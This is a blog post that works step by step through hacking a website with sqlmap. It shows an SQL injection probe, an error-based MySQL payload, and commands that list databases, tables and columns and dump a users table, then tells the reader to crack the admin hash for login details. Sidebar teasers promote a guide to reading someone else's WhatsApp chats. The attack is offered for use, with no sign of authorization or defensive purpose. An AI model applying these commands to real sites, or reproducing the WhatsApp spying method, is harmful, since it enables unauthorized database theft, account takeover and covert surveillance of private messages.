How to Hack websites use sqlmap

-

 



URLs

Let’s say you have a url like this

http://www.site.com/section.php?id=51

and that it is prone to sql injection because the developer of that site did not properly escape the parameter id. This can be tested simply by trying to open the url

http://www.site.com/section.php?id=51′

We just added a single quote in the parameter. If this url throws an error, then it is clear that the database has reacted with an error because it got an unexpected single quote.

Hacking with sqlmap

Now its time to move on to sqlmap to hack such urls. The sqlmap command is run from the terminal with the python interpreter.

python sqlmap.py -u “http://www.site.com/section.php?id=51”

The above is the first and most simple command to run with the sqlmap tool. It will check the url and try to discover basic information about the system. The output can look something like this

[*] starting at 12:10:33[12:10:33] [INFO] resuming back-end DBMS ‘mysql’
[12:10:34] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:

Place: GET
Parameter: id
Type: error-based
Title: MySQL >= 5.0 AND error-based – WHERE or HAVING clause
Payload: id=51 AND (SELECT 1489 FROM(SELECT COUNT(*),CONCAT(0x3a73776c3a,(SELECT (CASE WHEN (1489=1489) THEN 1 ELSE 0 END)),0x3a7a76653a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)

[12:10:37] [INFO] the back-end DBMS is MySQL
web server operating system: FreeBSD
web application technology: Apache 2.2.22
back-end DBMS: MySQL 5

So the sqlmap tool has discovered the Operating system, web server, and database along with version information. Even this much is pretty impressive. But it’s time to move on and see what more is this tool capable of.
 
Discover Databases
In this step, sqlmap shall be used to find out what databases exist on the target system. Again the command is very simple

$ python sqlmap.py -u “http://www.sitemap.com/section.php?id=51” –dbs

The output could be something like this

[*] starting at 12:12:56[12:12:56] [INFO] resuming back-end DBMS ‘mysql’
[12:12:57] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:

Place: GET
Parameter: id
Type: error-based
Title: MySQL >= 5.0 AND error-based – WHERE or HAVING clause
Payload: id=51 AND (SELECT 1489 FROM(SELECT COUNT(*),CONCAT(0x3a73776c3a,(SELECT (CASE WHEN (1489=1489) THEN 1 ELSE 0 END)),0x3a7a76653a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)

[12:13:00] [INFO] the back-end DBMS is MySQL
web server operating system: FreeBSD
web application technology: Apache 2.2.22
back-end DBMS: MySQL 5
[12:13:00] [INFO] fetching database names
[12:13:00] [INFO] the SQL query used returns 2 entries
[12:13:00] [INFO] resumed: information_schema
[12:13:00] [INFO] resumed: safecosmetics
available databases [2]:
[*] information_schema
[*] safecosmetics

This time the output contains the available databases list.

Find tables in the database
Now it’s time to find out what tables exist in a particular database. Let’s say the database of interest here is ‘safecosmetics’
Command

$ python sqlmap.py -u “http://www.site.com/section.php?id=51” –tables -D safecosmetics

and the output can be something similar to this

[11:55:18] [INFO] the back-end DBMS is MySQL
web server operating system: FreeBSD
web application technology: Apache 2.2.22
back-end DBMS: MySQL 5
[11:55:18] [INFO] fetching tables for database: ‘safecosmetics’
[11:55:19] [INFO] heuristics detected web page charset ‘ascii’
[11:55:19] [INFO] the SQL query used returns 216 entries
[11:55:20] [INFO] retrieved: acl_acl
[11:55:21] [INFO] retrieved: acl_acl_sections
[11:55:22] [INFO] retrieved: acl_acl_seq
[11:55:24] [INFO] retrieved: acl_aco
[11:55:25] [INFO] retrieved: acl_aco_map
[11:55:26] [INFO] retrieved: acl_aco_sections
[11:55:28] [INFO] retrieved: acl_aco_sections_seq
………..

Isn’t this amazing? Let’s get the columns of a particular table now.

Get columns of a table
Now that we have the list of tables, it would be a good idea to get the columns of an important table. Lets say the table is ‘users’ and it contains the username and password.

$ python sqlmap.py -u “http://www.site.com/section.php?id=51” –columns -D safecosmetics -T users

The output can be something like this

[12:17:39] [INFO] the back-end DBMS is MySQL
web server operating system: FreeBSD
web application technology: Apache 2.2.22
back-end DBMS: MySQL 5
[12:17:39] [INFO] fetching columns for table 'users' in database 'safecosmetics'
[12:17:41] [INFO] heuristics detected web page charset 'ascii'
[12:17:41] [INFO] the SQL query used returns 8 entries
[12:17:42] [INFO] retrieved: id
[12:17:43] [INFO] retrieved: int(11)                                                                                         
[12:17:45] [INFO] retrieved: name                                                                                            
[12:17:46] [INFO] retrieved: text                                                                                            
[12:17:47] [INFO] retrieved: password                                                                                        
[12:17:48] [INFO] retrieved: text                                                                                            
[12:17:49] [INFO] retrieved: permission                                                                                      
[12:17:51] [INFO] retrieved: tinyint(4)                                                                                      
[12:17:52] [INFO] retrieved: email                                                                                           
[12:17:53] [INFO] retrieved: text                                                                                            
[12:17:54] [INFO] retrieved: system_home                                                                                     
[12:17:55] [INFO] retrieved: text
[12:17:57] [INFO] retrieved: system_allow_only
[12:17:58] [INFO] retrieved: text
[12:17:59] [INFO] retrieved: hash
[12:18:01] [INFO] retrieved: varchar(128)
Database: safecosmetics
Table: users
[8 columns]
+-------------------+--------------+
| Column            | Type         |
+-------------------+--------------+
| email             | text         |
| hash              | varchar(128) |
| id                | int(11)      |
| name              | text         |
| password          | text         |
| permission        | tinyint(4)   |
| system_allow_only | text         |
| system_home       | text         |
+-------------------+--------------+

Now the columns are clearly visible.

Get data from the table
Now comes the most interesting part, extracting data from the table. The command would be

$ python sqlmap.py -u “http://www.site.com/section.php?id=51” –dump -D safecosmetics -T users

The above command will simply dump the data of the particular table, very much like the mysql dump command.

The output might look similar to this

+----+--------------------+-----------+-----------+----------+------------+-------------+-------------------+
| id | hash               | name      | email     | password | permission | system_home | system_allow_only |
+----+--------------------+-----------+-----------+----------+------------+-------------+-------------------+
| 1  | 5DIpzzDHFOwnCvPonu | admin     | <blank>   | <blank>  | 3          | <blank>     | <blank>           |
+----+--------------------+-----------+-----------+----------+------------+-------------+-------------------+

The hash column seems to have the password hash. Try cracking the hash and then you will get the login details right away. Sqlmap will create a csv file containing the dump data for easy analysis.

Comments

Post a Comment

Popular posts from this blog

How to Hack WhatsApp Chats

-
Image
How to Hack WhatsApp Chats   If you’ve come across this article, you probably need to read somebody’s messages on WhatsApp or view shared media files. In this article, you’ll find the best 7 ways to hack WhatsApp chats. I recommend you to look through all of them and choose the one that meets your technical skills and monitoring needs.  DISCLAIMER: The article is intended to be used and must be used for informational purposes only.  1. Hack WhatsApp by syncing the web version with the device via the QR code.  The main WhatsApp vulnerability is the web version of the service known as WhatsApp Web. To access the target’s account, all you need to do is to accurately configure WhatsApp analog in the web browser and, further, use the captured data for your own purpose. The only con of this hacking method is a requirement of physical access to the target smartphone. However, it’s necessary only for a moment.  To hack WhatsApp, do the following: 1. Decide how you are going to read the target’
Read more

Installation of Java

-
Image
  2. Installation of Java 2.1. Recommended Java version It is recommended to use last least the latest long-term release version of Java. Currently this is Java 11. 2.2. Check installation To run Java programs, you: must have the Java runtime environment (JRE) installed the Java executables must be available in your path environment You can test if the JRE is correctly installed via a console. To open a console on Windows: Win+R, enter  cmd and press Enter). Now type in the following command: java -version If the JRE is correctly installed, this commands prints information about your Java installation. In this case you can skip the Java installation description. If the command line returns the information that the program could not be found, you have to install Java. 2.3. Install Java For Microsofts Windows, Oracle provides a native installer which can be found on the  Java website . It contains instructions how to install Java for all supported platforms. Install Java on Ubuntu On Ubu
Read more

Integrated Development Environment

-
Image
  12. Integrated Development Environment The previous chapter explained how to create and compile a Java program on the command line. A Java Integrated Development Environment (IDE) provides lots of ease of use functionality for creating Java programs. There are other very powerful IDEs available, for example, the Eclipse IDE. For an introduction on how to use the Eclipse IDE please see  Eclipse IDE Tutorial . The remaining description uses the phrase:  "Create a Java project called…​". This refers to creating a Java project in Eclipse. If you are using a different IDE, please follow the required steps in that IDE.
Read more